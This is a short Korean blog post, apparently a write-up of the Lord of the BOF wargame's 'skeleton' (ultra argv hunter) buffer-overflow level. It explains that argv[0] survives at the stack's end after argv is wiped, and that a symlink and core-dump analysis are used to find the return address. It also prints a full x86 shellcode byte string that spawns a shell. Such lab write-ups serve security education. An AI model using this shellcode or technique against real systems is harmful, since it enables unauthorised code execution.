안녕하세요
ultra argv hunter! 부분을 보면
argv[]를 초기화 한다
모두 초기화 된다 해도
스택에 끝에 프로그램 경로는 남아있습니다
스택 메모리를 살펴보자
이름을 찾았다
초기화를 했지만 스택 끝에
argv[0]이 남아있는걸 확인했다
심볼릭 링크를 만든다
코어를 분석해보자
사용할 주소는 0xbfffffd0 이다
여기서 쉘코드 때문에 고생했다
왜 그런지는 모르겠지만
\x68\x8a\xe2\xce\x81\x68\xb1\x0c\x53\x54\x68\x6a\x6f\x
8a\xe4\x68\x01\x69\x30\x63\x68\x69\x30\x74\x69\x6a\x14
\x59\xfe\x0c\x0c\x49\x79\xfa\x41\xf7\xe1\x54\xc3
이 쉘코드를 사용하니 됬다!!
아무튼 성공했다.....
'WARGAME > Lob' 카테고리의 다른 글
| LOB LEVEL12 (Golem ==> darkknight) (0) | 2015.12.16 |
|---|---|
| LOB LEVEL11 (skeleton ==> golem) (0) | 2015.12.15 |
| LOB LEVEL9 (Troll ==> Vampire) (0) | 2015.12.13 |
| Lob Level8 (orge ==> troll) (0) | 2015.12.13 |
| Lob Level7 (darkelf ==> orge) (4) | 2015.03.25 |
